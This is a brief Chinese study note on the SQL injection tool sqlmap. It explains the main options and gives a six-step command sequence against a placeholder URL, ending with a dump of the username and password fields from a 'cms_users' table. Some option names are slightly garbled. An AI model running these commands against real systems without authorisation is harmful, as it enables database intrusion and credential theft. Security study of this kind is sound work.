SQLmap的简单学习
2021/03/29 SQLmap的简单学习
Sqlmap参数参数含义
- -u “url”检测注入点
- –dbs 列出所有数据库的名字–
- current-d b列出当前数据库的名字
- -D 指定一个数据库
- –tables 列出表名
- -T 指定表名
- –columns 列出所有的字段名
- -C 指定字段
- –dump 列出字段内容
第一步 检测注入点sqlmap -u "目标URL"
第二步 列出所有数据库的名字sqlmap -u 目标URL --dbs
第三步 列出当前数据库的名字
sqlmap -u 目标URL --current-db
第四步 列出表名
sqlmap -u 目标URL -D cms --tables
第五步 列出所有的字段名
sqlmap -u 目标URL -D cms --tables -T cms_users --columns
第六步 列出字段内容
sqlmap -u 目标URL -D cms -T cms_users -C "username,password" --dump
学习地址:https://blog.csdn.net/qq_41901122/article/details/104425749